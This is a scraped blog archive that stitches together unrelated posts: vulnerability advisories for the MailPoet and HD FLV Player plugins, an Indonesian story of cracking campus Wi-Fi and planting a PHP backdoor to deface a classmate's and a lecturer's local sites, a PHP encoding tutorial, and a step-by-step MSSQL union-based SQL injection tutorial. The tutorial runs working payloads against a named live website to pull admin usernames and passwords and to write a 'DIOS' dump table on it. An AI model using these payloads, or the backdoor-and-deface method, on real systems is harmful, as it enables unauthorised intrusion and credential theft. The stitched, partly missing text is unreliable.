Tuesday, February 3, 2015

Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required).

This is a serious vulnerability, The MailPoet plugin (wysija-newsletters) is a very popular WordPress plugin (over 1,700,000 downloads). This vulnerability has been patched, if you run the WordPress MailPoet plugin please upgrade ASAP!

Are you affected?

If you have this plugin activated on your website, the odds are not in your favor. An attacker can exploit this vulnerability without having any privileges/accounts on the target site. This is a major threat, it means every single website using it is vulnerable.

The only safe version is the 2.6.7, this was just released a few hours ago (2014-Jul-01).

Why is it so dangerous?

This bug should be taken seriously, it gives a potential intruder the power to do anything he wants on his victim’s website. It allows for any PHP file to be uploaded. This can allow an attacker to use your website for phishing lures, sending SPAM, host malware, infect other customers (on a shared server), and so on!!

Technical Details

Our research team discovered this flaw a few weeks ago and immediately disclosed it to the MailPoet team. They responded very well and released a patch as quickly as possible.

Because of the nature of the vulnerability, specifically it’s severity, we will not be disclosing additional technical details. The basics of the vulnerability however is something all plugin developers should be mindful of: the vulnerability resides in the fact that the developers assumed that WordPress’s “admin_init” hooks were only called when an administrator user visited a page inside /wp-admin/.

It is a easy mistake to make and they used that hook (admin_init) to verify if a specific user was allowed to upload files.

However, any call to /wp-admin/admin-post.php also executes this hook without requiring the user to be authenticated. Thus making their theme upload functionality available to everybody.

Pro-tip: If you are a developer, never use admin_init() (or is_admin()) as an authentication method.

How should you protect yourself?

Again, Update the plugin as soon as possible. Keeping WordPress and all plugins updated is the first step to keep your sites secured.

vulnerability affecting HD FLV Player

We’ve been notified of a critical vulnerability affecting the HD FLV Player plugin for Joomla!, WordPress and custom websites. It was silently patched on Joomla! and WordPress, leaving the custom website version vulnerable.

Furthermore, websites running this plugin are also at risk of being abused to send spam emails, an issue which wasn’t fixed in the updated version.

Impacts of the Vulnerability

Websites using one of the aforementioned CMS applications and running an outdated version are vulnerable to an Arbitrary File Download vulnerability which could be used, depending on the platform, to take control of the targeted website. It is important to note that websites using the custom version of this plugin are still vulnerable.

The issue is found in the following files: download.php and email.php

This is what the Download.php code looks like:


From this snippet we can see how the attacker is able to download almost any file they like to the server. There are no security checks being applied before accessing this file, making it accessible, and exploitable, to anyone that knows the url structure to the file.
Same thing goes for email.php, it filters the variables used to send emails:





Then it assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:




Unfortunately, the “Referer” field can easily be modified by the attacker to match pretty much anything they want, so it’s not any more secure to validate requests this way.

Update (or delete)!

This is a critical vulnerability.

If you use this plugin on a custom website, we highly recommend you to either remove these two files (download.php and email.php). For WordPress/Joomla! users, be sure to update your plugins/extensions; in this instance applying an update should protect you from the Arbitrary File Download vulnerability. You should still remove the “email.php” file from your site to prevent your mail server’s IP from getting blacklisted, something we see often.



Thursday, January 22, 2015

Kisah Mahasiswa jatuh Cinta Di hari pertama Kuliah

Hari pertama aku berada di Universitar, 

Aku Dan masa kecilku Adalah Seorang Anak Yang pendiam 
Dan tidak banyak bicara dengan orang"  sekitarku Begitu Juga dengan masalah cintaku :D
Engak Usah Bayak Basa basi" Aku Ingin menceritakan Pengalaman Yang bisa di Bilang Pengalaman Ku sendiri Atau Hanya Sebagai Imajinasi Ku  Untuk bercerita .
Setelah menyelesaikan Study Ku Di Sekolah Menengah Aku pun Ingin Kuliah
Yang sebenarnnya bukan keinginanku Juga :) Tapi Apa Boleh Buat :D. Dan Aku Pun Di suruh Sama
OangTua ku Untuk Mengambil Jurungan IT,Karna Aku Sudah Brabtasi Dengan Yang Namannya Internet Hampir 4 Tahunan Lah :)
Tapi Aku engak Mau Kalo Harus Kuliah IT di Universitar Yang khusunnya Berada di Aceh,
Krna Aku Tau Buat Apa belajar Programers Di kalangan Desa?
Bahkan Di Indonesia Sendiri,Programers Tidak Di butuhkan Berbeda Dengan Negara Luar,Maka Dengan Alasan Itu lah Ak tidak Mau masuk Jurusan IT Karna Masyarakat Cuma Butuh install Ulang Dan takut Yang Namannya virus Waktu kedeteck sama Acunetik Lol
Yang Gajinnya bisa di Bilang wow banget :0.
Hari Pertama Masuk Kuliah Dengan Seragam Yang Apa adannya, Dan Aku Kelihatan Sangan Cupu Dan bodoh XP :v
Karna Aku masuk Kuliah Bagian Jahit" Baju :) Dan Saat Itu mataku Tidak berkedip Melihat sosok bidadari yang mau turun dari langit
kex kisah jaka tarub aja :v Dan Hatiku berdetak kenjang sangat kenjang :) dalam hati ku berkata "aku jatuh cinta"
Dan aku Pun melanjutukan perjalanan ku ke kelas pertama ku dan di jalan aku bertemu dengan seseorang dan bertanya
kenal sama cewek yang baju biru itu engak??
sepontan dia menjawab ,
ohhh Itu anak IT Kuliah di sini juga dan dia Lumayan sombong kalo Ketemu sama Adik" letingkex kita :) Dan mahasiswi yangpinter juga tu kalo soal IT
Dan dia Juga termasuk Yang paling cantik di sini Dan Namannya Nikita :)
wahhh Pantesan Pikirku,Akusuka sama dia LOL Dan Baik Juga Abang Itu :v
Setelah Jam pelajaran Pertama Aku Pun Keluar Dari Kelas Ku sambil Mencari Udara Segar Karna Di Kelas Suasana Nya Panas Banget
Dan Sekali Lagi Mataku Tidak berkedip Untuk Sesaat Karna Aku Melihat Cewek yang Pakai Baju Biru Itu Tadi :) Sambil Membawa Tas Labtop
Dan Menuju ke sebuah Lab Sambil Di susun Teman" sekelasnnya .
Suasana Pun berubah melihat Anak IT pergi ke Lab, Mungkin mereka mau Belajar tentang web,Pikirku
Aku pun sangat senang Dan bergegas Mengambil Labtop Rongsokan Ku walaupun rongsokan tapi lumayan untuk browser dengan 50+ tab lebih :v
Seketika itu Aku pun Langsung Menyalakan Rongsokan Ku itu :) Dengan Os windows XP,Os gagal Seduniannya XD
Terus Aku Cari Jaringan Wifi Kampus Itu Dan Aku Sangat Bayak Menumukan Wifi Dan Keliatan Name ID wifi kampus dengan Nama
Lab xxxx Tanpa bertanya ke orang" Rongsokan Langsung Ku Buka Consoole Dan Dan Cuma Membuat Beberapa menit wordlist dengan Nama sekolah itu
xxxx2011
xxxx2014 dll
Dan Aku Mencoba mencari ssid Yang aktif Dan Blalala blalala Saya Tidak Menjelaskan Carannya Dan TARAAAAA...
Password wifi Pun Udah Di tangan.Aku Pun berpikir Untuk Menyescan Client Yang Online di wifi Tersebut Dan Tanpa Ku sadari
Lagi Lagi Dan Lagi kox Masih Pakai Tp-li** Yang Bug nya Udah Gagal Bahkan Kayaknnya Di semua Tp-**** Udah Di tanam Backdoor
Dan saya Pun Tidak Tau Apakah Mereka yang produk Tau Hal Itu Atau Olah Mereka Sendiri,Engak usah Di bahas Juga,Engak Penting :)
Dan Aku Pun Meninggalkan Scan-avender yang ada di windos Ku Dan beralih Dengan Memanfaatkan Bug wifi Nya Aja,Biar Lebih Mudah"
Tanpa waktu bermenit" Aku dan rongsokanku menemukan password admin wifi dan Tanpa blabla lagi,Aku langsung masuk ke admin wifi nya
dan Segera Aku Pun Melihat Client Ip Dan macanddres nya :) Kira" Ada 20+ lebihlah yang online nya :)
pertama Aku mulai menebak ip cewek yang namannya nikita itu,Karna Target Ku adalah Dia XP :v
pertama aku buka ip yang paling atas karna dia yangpertama masuk ke lab itu ehhhhhh BUlshit Setelah Aku Buka ip iu di
browser cantik ku ehhhh Teryata Itu Ip Punya Dosennnya ..
Koxx tau ??
Jelas taulah ...
Index nya Aja Pelajaran Semua Dari mysql dan buat web dan blalalalalla Sampai Akhir Dan segera ku close deh ip nya
dan aku pun ingat, ehhh ngapain di close nntik Di akhir cerita Dosen Nya di kerjaain Juga LoL :v
Aku pun melanjutkan Dengan IP kedua Ehhhh SenangNyaaaa brai, Jelas Terlihat Di Index nya Ada Naama Copyring Nikita Blalalal
Dan Jossss Pikir ku :v
Aku Pun mencari celah untuk masuk ke kompi nya tu cewek dan tanpa pikir panjang
Kalo itu cewek gunakan winows 8 Atau 7 Boleh Jadi itu cewek makai wamp atau xampp
Terus Aku pun mencoba menulis di browser ku dengan ip ***.***.***.**/xampp Dan Bulshit tampilan si orange pun Muncul
Terus Aku Coba Akses Ke mysql nya Dan Bulshit untuk ke sekian Kali nya, Bahwa mysql nya kagak di password
Mungkin Kebetulan Aja yahhh Atau Emang Dia Lebih pinter LOL :)
Dan Aku dan roongsokan Ku mencari bugs upload file ke web tersebut dan teryata ada di folder xampp sendiri,mungkin untuk pelatihan cara upload yahh :)
Aku pun Langsung backdoor edited simple ku sendiri ke kompi si cewek,
Setelah aku upload,aku pun langsung membukannya ip/girl.php Taraa, Backdoor nya bisa di akses Dan tanpa berpikir Aku
mencoba untuk menganti index nyaa, ehhhh sebentar pikir ku, Aku coba liat" ahhh Apa yang di sukai tu cewek dan apa yang sering di lakukakn :v
dengan perintah ls aku pun menemukan bayak file di dir xampp dan aku mencoba mengakses data sistem nya ddengan commad Cd ..
Dan jreeeng" jreehhhhh Semua Bisa keliatan Dari Dia Download foto" cowok korea atau apalah :v :v engak boleh tau :P Rahasia :P
Setelah beberapa menit melihat isi kompinnya Aku pun Berniat Untuk mengerjai Itu cewek :P
Kox jahat Kali???
Bukan Jahat, Pengen Kenalan Aja :P Pertama Aku backup index nya Dan Backup Juga Index di Dir xampp Nya Dan Aku pun mengantikan Dengan Sebuah Scipt
Defeca Kepo Buatan Ku sendiri Dengan souds Romatis Lengkap Dengan Fotonnya Dia Yang Aku Download Tadi :P Serta Kata" Pendek dari Ku
Lebih KurangGiini Kata"nya
"blalala balla
babablllalababalalalla " Kagak boleh tau :P :P Lengkap Dengan Direck ke FB ku Pooi Chai or /fb.me/iloveyou7789
wkwkwkwkwkwwk, Gua Yakin Itu cewek srok banget melihat tampilan web nya dengan fotonnya sendiri Dan kata" romantis :v
Dan sambil Fban Aku pun melihat inbox, Nantik Pulang Sekolah Temui Aku di pintu gerbang :)
yeahahhhhhh yeahhhh horeee pikirku :) Dan Tidak Hanya itu Aja cerita nya ,Makin isenglagi Index web nya pak dosen yang jalan di Localhost
Juga TESTED By Apa Rabo :v :v :v
DANNN DANNNN Setelah Itu rongsokan pun Langsungmasuk ke keranjang nya lagi :P :v :v
Setelah pulang sekolah aku pun menunggu itu cewek :) Dan Aku Pun di Ajak Kenalan
woowww banget kan Gan :v :v Dan dia tanyak Kamu semester berapa??
Dengan Nada yang rendah Aku menjawab Aku mahasiswa baru kak :/
Jurusan Apa ??
Jahit Kak :/
heheheheh cewek itu pun tertawa :) loe pikir ini lucu apa bisik ku dalam hati :D
Ehhh Jangan Manggil Kak Lah ,Panggil Aja Nama ku Nikita , Nama Kamu siapa ??
Dono Kak :/ :/
Dan samapai Akhir nya Dia Kasih Nomer Hp dan Teryata Dia Anak orangKaya Juga Gan,Kulaih Aja Pakai Mobil sedangkan Gua Cuma
Pakai Rongsokan Orang tua Ku :) Dan I bangga :) )
Dan Akhirnnya ????
Mikir sendiri Aja
Lagi malas nules lagai :P

JADIIIIIIIIIIIIIIIIII
INNTINNYA saya cuma sedikit berbagi cara Defece Dengan Methoad???
Methoad Apa Yahhh Kex gitu ,
Methoad Alay Bin Ajib By pooi chai
Gunakan Ilmu Pada Tempatnnya :) Dan Jangan merusak :)
Byeeeeeeeeeee,,,,,, Sampai Akhirnnya Si Nikita Jatuh Color Itu ke pelukan si cupu DONO :D :D
Nahhh Atu Lagi Bahasa nya juga Engak jelas,Mohon Maklumi Aja Karna baru nulis
Dan Kalimat" nya juga engak teratur Dan Kalo Di nilai Dalam Bahasa Indonesia
Nilainnya -5 :v Tapi Maklumi AJa ,Karna Hanya Sekedr berbagi , Byyee Cantik 

Encode Dan Decode PHP mudah

I gives us our third function, gzdeflate() is used to “compress the given string using the DEFLATE data format.”
Again, not gonna veer off — let’s stay focused with a quick example.


Let’s say we want to “gzdeflate” the following string:
<?php $string = 'Encoding and Decoding Encrypted PHP Code'; ?>
We run this string through gzdeflate() and set it as a variable named $compressed:
<?php $compressed = gzdeflate($string); ?>
Echoing the $compressed variable to the browser, we get this bizarre-looking gibberish:


s�K�O��KWH�KQpI�r\���*JRS��SR

To “decode” this alien-speak, we inflate it with the converse function, gzinflate(), to restore the original string. Here is an example that returns the original string to a variable named$uncompressed:
$uncompressed = gzinflate(gzdeflate($string));

Echoing $uncompressed, we see the original string as expected:
Encoding and Decoding Encrypted PHP Code


AND
Copy/paste example:
<?php // gzinflate()/gzdeflate() example$string       = 'Encoding and Decoding Encrypted PHP Code';$compressed   = gzdeflate($string);$uncompressed = gzinflate($compressed);echo $compressed ."\n";echo $uncompressed;?>
Parameters
Also worth mentioning: whereas the first two functions — str_rot13() and base64_encode() — accept only one parameter (the input $string), the inflate/deflate functions accept twoparameters. Perhaps surprisingly, these second parameters are different between the two functions:
-gzdeflate() — level = the level of compression ( to 9)
-gzinflate() — length = the maximum length of data to decode
Returning to our example, let’s employ these second parameters to help visualize:


<?php // example using second parameters$string       = 'Encoding and Decoding Encrypted PHP Code';$compressed   = gzdeflate($string, 9); // compression level set to 9 = maximum$uncompressed = gzinflate($compressed, strlen($string)); // length set to same as $stringecho $compressed ."\n";echo $uncompressed;?>
And the result as displayed in a browser:
s�K�O��KWH�KQpI�r\���*JRS��SR

>Encoding and Decoding Encrypted PHP Code

Saturday, November 1, 2014

Step By Step MSSQL Union Based Injection

In the Name of ALLAH the Most Beneficent and the Merciful

After a lot of Tutorials on MySQLi now we are moving to MSSQLi. Yeah!! it may not be some very new shit you may get over here, but i included some of the new tricks which rummy, me and Sufyan found while learning and it could be a handy guide for a n00b like me while injecting into a MSSQL based website. So first of all we need to know the basics of injecting, all the basics including finding the type of injection, database testing and finding the columns etc are same to other databases so i ll suggest you to read the basics before you start here if you dint read them yet.
SQLi Basics 1
SQLi Basics Part 2
SQLi Basics Part 3
Detecting the Database
In this Series of MSSQL Injection we will learn the following types of Injection for MSSQL 
1. MSSQL Union Based Injection
2. MSSQL Error Based Injection
3. MSSQL Blind Injection
4. MSSQL Time Based Blind Injection
5. MSSQL Error Based Blind Injection
6. MSSQL DIOS (Dump in One Shot)

So in this tutorial we'll start with MSSQLi Union Based injection and yeah also will discuss solution for some shit which happens while injecting into MSSQL database.
Actually the truth is something like when we see that the website we want to hack is on PHP/MySQL our reaction is like: 


But if the website we want to hack is on ASP/MSSQL then the reaction is somewhat:


But i hope till the time we finish up with our complete series on MSSQLi we'11 be pretty setisfied with our knowledge on MSSQL injection. 
Here is the complete Video:
 
For this tutorial we will use http://aquaservices.co.in/Product.aspx?Id=13 as this site gives most of the problems which you might face while MSSQL Injection.

So the checking part is same as MySQL first putting single quote and then putting double quote checking the error and i came to know this one is single quote based injection.
http://aquaservices.co.in/Product.aspx?Id=13%27
ERROR
http://aquaservices.co.in/Product.aspx?Id=13%22
ERROR
InformationWhen both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.









Now to go ahead we need to know the comment type for MSSQL.
CommentName
--:Comment Type 1
--+:Comment Type 2
--+-:SQL Comment
/**/:Inline Comment
;:Null Byte

Now lets try the basic -- comment with our target
http://aquaservices.co.in/Product.aspx?Id=13--
working fine.
http://aquaservices.co.in/Product.aspx?Id=13 order by 1--
No Error
http://aquaservices.co.in/Product.aspx?Id=13 order by 100--
Here comes the error : The order by position number 100 is out of range of the number of items

Now we can continue with order by and in the end we come to know that 8 is the last working column. Now the next part is using using the union select query.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8--
Again we got a error : Operand Type Clash: text is incompatible with int

In case of Such Errors on Union select statement we have an option to use null in all columns, so lets try that.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--
Again we got a error : The text data type cannot be selected as DISTINCT because it is not comparable.

Heres one more type of error you can find while MSSQL Injection and the solution for this is just use "Union All Select" in place of "Unoin Select", Lets try.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--
Again we got a error : Conversion from type 'DBNull' to type 'String' is not valid. Also known as Datatype Mistmatch Error

The Solution for this type of Errors is as here we can see DBNULL to STRING mismatch so we have to convert each column one by one and see if we can get make it to work. To put a string we can use single quotes but i prefer using the db_name() function to avoid some error. Here we have Eight Columns changing each column one by one could be easy by it could be a pain when there are 20 or more columns so i have a developed a payload generator to make that easy for us. I am gonna generate the payloads which will put db_name() in eight columns one by one.

Here is the link

Now you can use Burp Suite or ZAP Proxy to Fuzz the above payload on place of columns as you can see in the video.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave this column as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that columns as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,db_name(),5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--
Here we can see the second Column Getting printed.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),db_name()--
Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the Database name in Error)
Now we can Put @@version on place of vulnerable column to get the current version from database.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

And we got the version, now we can get the current database name using db_name().
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,db_name(),8--

There are some other ways also to collect some more information from MSSQL which are given here:
Query/FunctionOutput
@@version:Current Version
user_name():Current User
user,system_user,current_user:Current User
db_name():Current Database
db_name():Current Database
@@SERVERNAME:Hostname
Now we will extract the table names, here the syntax is a little bit different than MySQL of lack of limit clause in MSSQL.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
We got the first table name : AdminLogin
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
We got the second table name : Certificate
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
We got the Forth table name : ClientList
In the same manner we can get all the tables one by one. Now lets get the columns. I will extract the colums from AdminLogin table
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the first column from AdminLogin Table : IsActive
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the Second column from AdminLogin Table : Password
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the Third column from AdminLogin Table : UserName
We got the table names the column names and now lets extrct the data from them. For concatination we can use %2b which is +.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--
Now in the end i will like to show you how to make the whole process alot faster by using MSSQL DIOS
http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN :: 
'%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) 
from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' 
from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns
 : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--

It will give error but actually its making the DIOS table so now lets try checking the output under temp_dios_sample.

And here we got compete output at once. Before i finish i ll like to show you some basic errors in MSSQLi.
Error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 
[Microsoft][SQL Server Native Client 10.0][SQL Server]Executing SQL directly; no cursor.
Microsoft VBScript runtime error '800a000d' 
Type mismatch: 'id'
Error Executing Database Query.
Line 3: Incorrect syntax near ''.
The text data type cannot be selected as DISTINCT because it is not comparable.
Operand type clash: text is incompatible with int
So Here we are finished with MSSQL Union Based Injection.